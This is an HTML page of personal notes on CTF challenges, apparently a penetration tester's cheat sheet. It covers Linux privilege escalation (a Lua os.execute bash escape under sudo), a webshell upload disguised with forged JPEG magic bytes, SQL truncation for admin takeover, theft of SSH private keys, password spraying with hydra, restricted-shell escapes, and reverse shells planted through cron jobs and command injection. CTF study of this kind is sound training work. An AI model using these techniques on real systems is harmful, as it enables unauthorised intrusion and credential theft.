<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 15 (filtered)">
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:0cm;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:0cm;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:0cm;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
.MsoPapDefault
	{margin-bottom:8.0pt;
	line-height:107%;}
@page WordSection1
	{size:595.3pt 841.9pt;
	margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
	{page:WordSection1;}
 /* List Definitions */
 ol
	{margin-bottom:0cm;}
ul
	{margin-bottom:0cm;}
-->
</style>

</head>

<body lang=EN-GB style='word-wrap:break-word'>

<div class=WordSection1>

<p class=MsoListParagraph><b><span style='font-size:24.0pt;line-height:107%'>Scenarios
– taken from CTF challenges</span></b></p>
	
==========================================================================================================================================================
	
<p><a href="winscen.html" style="display:block; background-color: blue; width=100px ; padding: 20px; font-size: 30px; color:white; text-decoration:none;">
  Windows Priv Esc Scenarios
	</a></p>
	
===========================================================================================================================================================

<p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'>&nbsp;</span></b></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:olive'>#### Deleted file by admin</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>.bash_history
- reveals a file which has now been deleted (sudo -u sysadmin
/home/syadmin/luvit privesc.ua)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo -l -
reveals we can run root for certain software which execute lua code</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
&quot;require('os');&quot; &gt; priv.lua</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
&quot;os.execute('/bin/bash');&quot; &gt;&gt; priv.lua</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:lime'>#### uploading tool to server</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo mv
pspy64 /var/www/html</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo service
apache2 start</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:purple'>#### backgrounding a shell</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you can
create a shell code and use &amp; to background during SSH. Prevents other
users been blocked</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:navy'>#### Magic bytes</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you attempt
to upload a file abc.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- gets
flagged up immediately</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>way around
it: </span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>get the
magic bytes from a .jpg image (xxd image.jpg | head)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>add these to
start of our abc.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
'FFD8FFDB' | xxd -r -p &gt; webshell.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>then upload</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:aqua'>### SQL Truncation</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>-<b> </b>a website
states a username or email cannot be more than xyz size</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>-from burp
sending a username more than what is permitted</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so we
enter loads of spaces around admin and then url encode</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- this works
as according to MySQL documentation, trailing spaces are ingnored </span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so
register account using admin@test.abc then catch request</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so now if
we have an email of admin: admin@abc.abc add in many spaces after
(admin@abc.abc++++++++++++++test)</span></p>

<p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'>&nbsp;</span></b></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:teal'>#### Email changing to admin for priv</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>CTF
where by the standard user could change password of the admin by catching in
burpsuite and editing from user email to admin (which is found easily).</span></p>

<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:
14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then
when you go to profile of admin, source code view and you find</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>and
images upload directory.</span></p>

<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:
14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>So
you go bk to profile, upload a reverse php shell (no indicator if uploaded or
not)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>then
back to browser, type in /directory of image uploads followed by reverse shell</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>(ensure
listener is on) – may need to use CURL</span></p>

<p class=MsoListParagraphCxSpLast style='text-indent:-18.0pt'><span
style='font-size:14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then using
the priv /sbin/reboot we reboot using that .sh file</span></p>
	
<h1><b><span style='background:yellow'>###### Source code</span></b></h1>

<p class=MsoNormal>even on directories found - lookat source code!! and run
curl on them all</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>website - directory fuzz only gave one link (sec config
clue)</p>

<p class=MsoNormal>use curl -L , look at source</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:lime'>##### steghide extract issue</span></b></h1>

<p class=MsoNormal>tried to extract using steghide extract -sf filename.jpg -
would not work</p>

<p class=MsoNormal>however when I write to another file it worked!</p>

<p class=MsoNormal>steghide extract -sf filename.jpg -xf hash.txt</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:silver'>##### Authorized keys</span></b></h1>

<p class=MsoNormal>if you come across authorized keys from a userA but in the
key file it shows UserB at the end</p>

<p class=MsoNormal>you can log in as userA using private key of UserB</p>

<p class=MsoNormal>we take the private key of userB and put onto our attacking
machine, then we use that to log in as userA</p>

<p class=MsoNormal>ssh userA@xx.xx.xx.xx -i .ssh/id_rsa_userB</p>

<p class=MsoNormal>copy to system:</p>

<p class=MsoNormal>scp USERB@192.168.124.230:~/.ssh/id_rsa . </p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:maroon'>##### Enum’d everything, so cannot
find way in</span></b></h1>

<p class=MsoNormal>do directory scan with extension set ie . -x .php</p>

<p class=MsoNormal>(use dirsearch) - /web-content/big.txt -e .php</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:navy'>##### Config file for lateral
movement</span></b></h1>

<p class=MsoNormal>when doing a box if you find a user and still need to do
lateral movement</p>

<p class=MsoNormal>go to /etc/phpmyadmin and look for the config file</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:aqua'>##### DB/PHP passwords, user lists</span></b></h1>

<p class=MsoNormal>if you find db passwords, php passwords - create a user list
(from home) and run that single password with user list in hydra</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:red'>#### Upload perm to smb share / cron job in
management (box DAWN)</span></b></h1>

<p class=MsoNormal>you have management.log - which shows a cron job</p>

<p class=MsoNormal>eg: chmod 777 /home/dawn/ITDEPT/product-control </p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>you have upload access to smb share</p>

<p class=MsoNormal>create a NC one liner reverse shell and insert into
product-control and upload</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:fuchsia'>#### Unshadowed</span></b></h1>

<p class=MsoNormal>when we unshadowed pass shadow: the password is displayed,
use this to crack further</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:teal'>##### Restricted shell</span></b></h1>

<p class=MsoNormal>type export in cmd</p>

<p class=MsoNormal>is /bin writeable?</p>

<p class=MsoNormal>ls -la /usr/bin (or /bin)</p>

<p class=MsoNormal>look for writeable by all</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 2:</span></b></p>

<p class=MsoNormal>ssh in using: -t &quot;bash --noprofile&quot;</p>

<p class=MsoNormal>then need to use absolute paths - cat = /usr/bin/cat
&lt;file&gt;</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 3:</span></b></p>

<p class=MsoNormal>export
PATH=&quot;$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&quot;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:purple'>##### Making a file called
update in /tmp executable</span></b></h1>

<p class=MsoNormal>just echo a shell into it.</p>

<p class=MsoNormal>may need to use full path for nc (if used)</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>this is what enabled me to run chmod finally: </p>

<p class=MsoNormal>export
PATH=&quot;$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&quot;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:olive'>#### Command injection using |</span> </b></h1>

<p class=MsoNormal>command injection found, cannot view /etc/passwd</p>

<p class=MsoNormal>used burp suite</p>

<p class=MsoNormal>BUT reverse shells would not work, </p>

<p class=MsoNormal>command injection using | gives a cleaner output</p>

<p class=MsoNormal>enter the reverse shell as found (no url encoding or
anything) after the |</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>- another thing is the website is on port 80 u need to get a
reverse connection to port 80</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:lime'>#### Rabbit hole!</span></b></h1>

<p class=MsoNormal>easyboxfun</p>

<p class=MsoNormal>kept concentrating on /gym instead of doing a scan on the
main URL</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:aqua'>##### Reverse shell escaping issues (wpwpn
box)</span></b></h1>

<p class=MsoNormal>we trying to run a reverse shell using command
pre&lt;system&gt; ' ' &lt;/pre&gt; the python reverse obviously contianed </p>

<p class=MsoNormal>&quot;&quot; and '' so it double the amount of '' in use,
using \ before the '' enabled the reverse shell to connect</p>

</div>
	
 
</body>

</html>